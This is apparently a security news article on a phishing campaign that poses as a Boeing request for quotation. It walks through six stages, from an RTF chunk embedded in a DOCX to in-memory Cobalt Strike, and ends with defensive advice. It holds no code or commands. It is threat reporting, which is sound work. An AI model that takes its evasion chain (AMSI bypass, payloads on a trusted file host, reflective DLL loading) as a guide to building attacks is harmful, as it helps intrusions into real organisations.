Sophisticated Malware Campaign Targets Industrial Suppliers with Boeing RFQ Lure
In a recent and highly sophisticated cyberattack, threat actors have orchestrated a six-stage malware campaign targeting industrial suppliers and procurement teams. Disguised as a legitimate Request for Quotation (RFQ) from Boeing, the attack employs a complex sequence of malicious components, including DOCX, RTF, JavaScript, PowerShell, Python, and encrypted DLLs, culminating in the deployment of Cobalt Strike—a potent post-exploitation tool—entirely within the system’s memory.
Initial Deception: The Boeing RFQ Lure
The attack begins with a seemingly innocuous email, purportedly from Joyce Malave at Boeing, requesting quotations for high-quantity orders. The email includes an attached Word document with filenames such as Rfq and Payment Schedule.docx, Product_specifications.docx, or RFQ_PO_ATR29026II.docx. These documents are crafted to appear authentic, leveraging social engineering tactics to entice recipients into opening them.
Stage 1: Embedded RTF Exploit
Upon opening the DOCX file, an embedded RTF document is automatically loaded through a hidden relationship reference. This technique, known as aFChunk, forces Microsoft Word to process the embedded RTF without user interaction. The RTF file contains a hex-encoded JavaScript payload concealed within control words, ensuring that the malicious code remains hidden from the user.
Stage 2: JavaScript Dropper Activation
The embedded JavaScript, approximately 67 KB in size, employs obfuscation techniques such as junk strings to evade detection. It utilizes Windows Management Instrumentation (WMI) to silently execute a PowerShell script in a hidden window, maintaining stealth throughout the process.
Stage 3: PowerShell Script Execution
The PowerShell script is designed to disable TLS certificate checks and bypass Windows’ Antimalware Scan Interface (AMSI) using indirect method calls. It then downloads a 14.5 MB ZIP file from Filemail.com, a legitimate Norwegian file-sharing service, exploiting its clean domain reputation to avoid raising red flags.
Stage 4: Deployment of Python Runtime
The downloaded ZIP file, masquerading as an .mp3 file, contains a complete Python 3.12 runtime. This runtime is extracted and used to execute a script named Protected.py, which is 392 lines long and responsible for further stages of the attack.
Stage 5: Multi-Layered Obfuscation and Decryption
Protected.py employs multiple layers of obfuscation, including Base64 encoding, zlib compression, byte reversal, ROT13, and XOR operations. After stripping these layers, the script decrypts a file named license.pdf using AES-256-CBC encryption. Despite its name, license.pdf is actually an encrypted DLL file.
Stage 6: Reflective DLL Loading and Cobalt Strike Deployment
The decrypted DLL is reflectively loaded into the system’s memory, a technique that allows the execution of code without writing it to disk, thereby evading traditional file-based detection methods. This DLL serves as a loader for Cobalt Strike, granting attackers full interactive access to the compromised machine. With Cobalt Strike running entirely in memory, threat actors can perform data theft, lateral movement within the network, and further system compromises without leaving significant traces.
Campaign Scope and Impact
The campaign, identified as NKFZ5966PURCHASE, was first detected on March 30, 2026, when security researcher @JAMESWT_WT flagged a suspicious DOCX file on X (formerly Twitter). Subsequent analysis revealed at least 22 linked malware samples, with some payload delivery URLs remaining active at the time of discovery. The consistent use of legitimate tools and services throughout the attack chain—including Microsoft Word, PowerShell, a signed Python binary, and trusted file-sharing platforms—renders detection by conventional endpoint security solutions exceedingly challenging.
Mitigation Strategies
To defend against such sophisticated attacks, organizations should implement the following measures:
1. User Education and Awareness: Train employees to recognize phishing attempts and the risks associated with opening unsolicited email attachments, even from seemingly legitimate sources.
2. Email Filtering and Scanning: Deploy advanced email security solutions capable of detecting and blocking malicious attachments and embedded threats.
3. Endpoint Detection and Response (EDR): Utilize EDR solutions that monitor for suspicious behaviors, such as unusual script executions or memory-only payloads.
4. Regular Software Updates: Ensure that all software, including Microsoft Office and security tools, are up to date with the latest patches to mitigate known vulnerabilities.
5. Network Segmentation: Implement network segmentation to limit the spread of malware and restrict unauthorized access to sensitive systems.
6. Behavioral Analysis: Employ behavioral analysis tools to detect anomalies indicative of advanced persistent threats (APTs) and other sophisticated attack vectors.
Conclusion
The NKFZ5966PURCHASE campaign underscores the evolving complexity of cyber threats targeting industrial sectors. By leveraging a multi-stage attack chain that exploits trusted tools and services, attackers can infiltrate systems with minimal detection. Organizations must adopt a multi-layered security approach, combining user education, advanced detection technologies, and proactive threat hunting to effectively combat such sophisticated threats.
